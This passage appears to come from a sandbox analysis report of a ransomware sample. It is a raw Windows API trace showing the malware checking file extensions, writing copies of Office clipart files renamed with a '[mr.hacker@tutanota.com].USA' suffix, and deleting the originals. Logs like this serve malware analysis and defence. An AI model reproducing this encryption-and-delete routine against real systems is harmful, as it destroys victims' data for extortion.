(hFile=0x3b0) returned 1 [0273.065] CloseHandle (hObject=0x3b0) returned 1 [0273.065] SetFilePointerEx (in: hFile=0x2b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.065] SetEndOfFile (hFile=0x2b0) returned 1 [0273.067] CloseHandle (hObject=0x2b0) returned 1 [0273.067] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.067] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01759_.wmf")) returned 1 [0273.068] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF") returned 63 [0273.068] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF") returned 63 [0273.068] lstrlenW (lpString=".doc") returned 4 [0273.068] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.068] lstrlenW (lpString=".docx") returned 5 [0273.068] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.068] lstrlenW (lpString=".pdf") returned 4 [0273.068] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.068] lstrlenW (lpString=".xls") returned 4 [0273.068] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.068] lstrlenW (lpString=".xlsx") returned 5 [0273.068] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.068] lstrlenW (lpString=".ppt") returned 4 [0273.068] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.068] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF") returned 63 [0273.068] lstrlenW (lpString=".zip") returned 4 [0273.068] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.068] lstrlenW (lpString=".rar") returned 4 [0273.068] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.068] lstrlenW (lpString=".bz2") returned 4 [0273.068] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.068] lstrlenW (lpString=".7z") returned 3 [0273.068] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.068] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF") returned 63 [0273.068] lstrlenW (lpString=".dbf") returned 4 [0273.068] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.068] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF") returned 63 [0273.068] lstrlenW (lpString=".1cd") returned 4 [0273.068] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF") returned 63 [0273.069] lstrlenW (lpString=".jpg") returned 4 [0273.069] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF") returned 63 [0273.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF") returned 63 [0273.069] lstrlenW (lpString=".doc") returned 4 [0273.069] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.069] lstrlenW (lpString=".docx") returned 5 [0273.069] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.069] lstrlenW (lpString=".pdf") returned 4 [0273.069] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.069] lstrlenW (lpString=".xls") returned 4 [0273.069] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.069] lstrlenW (lpString=".xlsx") returned 5 [0273.069] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.069] lstrlenW (lpString=".ppt") returned 4 [0273.069] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF") returned 63 [0273.069] lstrlenW (lpString=".zip") returned 4 [0273.069] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.069] lstrlenW (lpString=".rar") returned 4 [0273.069] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.069] lstrlenW (lpString=".bz2") returned 4 [0273.069] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.069] lstrlenW (lpString=".7z") returned 3 [0273.069] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF") returned 63 [0273.069] lstrlenW (lpString=".dbf") returned 4 [0273.069] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF") returned 63 [0273.069] lstrlenW (lpString=".1cd") returned 4 [0273.070] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF") returned 63 [0273.070] lstrlenW (lpString=".jpg") returned 4 [0273.070] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.070] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0273.070] lstrlenW (lpString="HH01875_.WMF") returned 12 [0273.070] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01875_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0273.070] GetFileSizeEx (in: hFile=0x2b0, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=2616) returned 1 [0273.070] CloseHandle (hObject=0x2b0) returned 1 [0273.070] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01875_.wmf")) returned 0x20 [0273.070] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01875_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.070] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01875_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0273.070] SetFilePointerEx (in: hFile=0x2b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.071] SetFilePointerEx (in: hFile=0x2b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.071] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01875_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0273.071] GetLastError () returned 0x0 [0273.071] ReadFile (in: hFile=0x2b0, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0xa38, lpOverlapped=0x0) returned 1 [0273.085] WriteFile (in: hFile=0x3b0, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xa40, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xa40, lpOverlapped=0x0) returned 1 [0273.085] ReadFile (in: hFile=0x2b0, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0273.085] WriteFile (in: hFile=0x3b0, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.086] SetEndOfFile (hFile=0x3b0) returned 1 [0273.086] CloseHandle (hObject=0x3b0) returned 1 [0273.086] SetFilePointerEx (in: hFile=0x2b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.086] SetEndOfFile (hFile=0x2b0) returned 1 [0273.087] CloseHandle (hObject=0x2b0) returned 1 [0273.088] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.115] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01875_.wmf")) returned 1 [0273.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF") returned 63 [0273.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF") returned 63 [0273.115] lstrlenW (lpString=".doc") returned 4 [0273.115] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.115] lstrlenW (lpString=".docx") returned 5 [0273.115] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.115] lstrlenW (lpString=".pdf") returned 4 [0273.115] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.115] lstrlenW (lpString=".xls") returned 4 [0273.115] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.115] lstrlenW (lpString=".xlsx") returned 5 [0273.115] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.115] lstrlenW (lpString=".ppt") returned 4 [0273.116] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF") returned 63 [0273.116] lstrlenW (lpString=".zip") returned 4 [0273.116] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.116] lstrlenW (lpString=".rar") returned 4 [0273.116] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.116] lstrlenW (lpString=".bz2") returned 4 [0273.116] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.116] lstrlenW (lpString=".7z") returned 3 [0273.116] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF") returned 63 [0273.116] lstrlenW (lpString=".dbf") returned 4 [0273.116] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF") returned 63 [0273.116] lstrlenW (lpString=".1cd") returned 4 [0273.116] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF") returned 63 [0273.116] lstrlenW (lpString=".jpg") returned 4 [0273.116] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF") returned 63 [0273.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF") returned 63 [0273.116] lstrlenW (lpString=".doc") returned 4 [0273.116] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.116] lstrlenW (lpString=".docx") returned 5 [0273.116] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.116] lstrlenW (lpString=".pdf") returned 4 [0273.116] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.116] lstrlenW (lpString=".xls") returned 4 [0273.116] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.116] lstrlenW (lpString=".xlsx") returned 5 [0273.116] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.117] lstrlenW (lpString=".ppt") returned 4 [0273.117] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.117] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF") returned 63 [0273.117] lstrlenW (lpString=".zip") returned 4 [0273.117] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.117] lstrlenW (lpString=".rar") returned 4 [0273.117] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.117] lstrlenW (lpString=".bz2") returned 4 [0273.117] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.117] lstrlenW (lpString=".7z") returned 3 [0273.117] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.117] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF") returned 63 [0273.117] lstrlenW (lpString=".dbf") returned 4 [0273.117] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.117] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF") returned 63 [0273.117] lstrlenW (lpString=".1cd") returned 4 [0273.117] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.117] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF") returned 63 [0273.117] lstrlenW (lpString=".jpg") returned 4 [0273.117] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.117] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0273.117] lstrlenW (lpString="HH02166_.WMF") returned 12 [0273.117] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02166_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0273.118] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=1324) returned 1 [0273.118] CloseHandle (hObject=0x3a8) returned 1 [0273.118] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02166_.wmf")) returned 0x20 [0273.118] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02166_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.118] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02166_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0273.118] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.118] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.118] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02166_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0273.118] GetLastError () returned 0x0 [0273.118] ReadFile (in: hFile=0x3a8, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x52c, lpOverlapped=0x0) returned 1 [0273.158] WriteFile (in: hFile=0x388, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x530, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x530, lpOverlapped=0x0) returned 1 [0273.158] ReadFile (in: hFile=0x3a8, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0273.158] WriteFile (in: hFile=0x388, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.158] SetEndOfFile (hFile=0x388) returned 1 [0273.158] CloseHandle (hObject=0x388) returned 1 [0273.158] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.158] SetEndOfFile (hFile=0x3a8) returned 1 [0273.161] CloseHandle (hObject=0x3a8) returned 1 [0273.161] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.161] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02166_.wmf")) returned 1 [0273.161] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF") returned 63 [0273.161] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF") returned 63 [0273.161] lstrlenW (lpString=".doc") returned 4 [0273.161] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.161] lstrlenW (lpString=".docx") returned 5 [0273.161] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.161] lstrlenW (lpString=".pdf") returned 4 [0273.162] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.162] lstrlenW (lpString=".xls") returned 4 [0273.162] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.162] lstrlenW (lpString=".xlsx") returned 5 [0273.162] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.162] lstrlenW (lpString=".ppt") returned 4 [0273.162] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF") returned 63 [0273.162] lstrlenW (lpString=".zip") returned 4 [0273.162] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.162] lstrlenW (lpString=".rar") returned 4 [0273.162] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.162] lstrlenW (lpString=".bz2") returned 4 [0273.162] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.162] lstrlenW (lpString=".7z") returned 3 [0273.162] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF") returned 63 [0273.162] lstrlenW (lpString=".dbf") returned 4 [0273.162] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF") returned 63 [0273.162] lstrlenW (lpString=".1cd") returned 4 [0273.162] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF") returned 63 [0273.162] lstrlenW (lpString=".jpg") returned 4 [0273.162] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF") returned 63 [0273.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF") returned 63 [0273.162] lstrlenW (lpString=".doc") returned 4 [0273.162] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.162] lstrlenW (lpString=".docx") returned 5 [0273.162] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.163] lstrlenW (lpString=".pdf") returned 4 [0273.163] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.163] lstrlenW (lpString=".xls") returned 4 [0273.163] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.163] lstrlenW (lpString=".xlsx") returned 5 [0273.163] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.163] lstrlenW (lpString=".ppt") returned 4 [0273.163] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF") returned 63 [0273.163] lstrlenW (lpString=".zip") returned 4 [0273.163] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.163] lstrlenW (lpString=".rar") returned 4 [0273.163] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.163] lstrlenW (lpString=".bz2") returned 4 [0273.163] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.163] lstrlenW (lpString=".7z") returned 3 [0273.163] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF") returned 63 [0273.163] lstrlenW (lpString=".dbf") returned 4 [0273.163] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF") returned 63 [0273.163] lstrlenW (lpString=".1cd") returned 4 [0273.163] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF") returned 63 [0273.163] lstrlenW (lpString=".jpg") returned 4 [0273.163] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.163] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0273.163] lstrlenW (lpString="HH02312_.WMF") returned 12 [0273.164] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02312_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0273.171] GetFileSizeEx (in: hFile=0x2bc, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=4970) returned 1 [0273.171] CloseHandle (hObject=0x2bc) returned 1 [0273.171] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02312_.wmf")) returned 0x20 [0273.172] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02312_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.173] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02312_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0273.173] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.173] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.173] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02312_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0273.177] GetLastError () returned 0x0 [0273.177] ReadFile (in: hFile=0x2bc, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x136a, lpOverlapped=0x0) returned 1 [0273.180] WriteFile (in: hFile=0x2ac, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x1370, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x1370, lpOverlapped=0x0) returned 1 [0273.181] ReadFile (in: hFile=0x2bc, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0273.181] WriteFile (in: hFile=0x2ac, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.181] SetEndOfFile (hFile=0x2ac) returned 1 [0273.181] CloseHandle (hObject=0x2ac) returned 1 [0273.181] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.181] SetEndOfFile (hFile=0x2bc) returned 1 [0273.183] CloseHandle (hObject=0x2bc) returned 1 [0273.183] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) 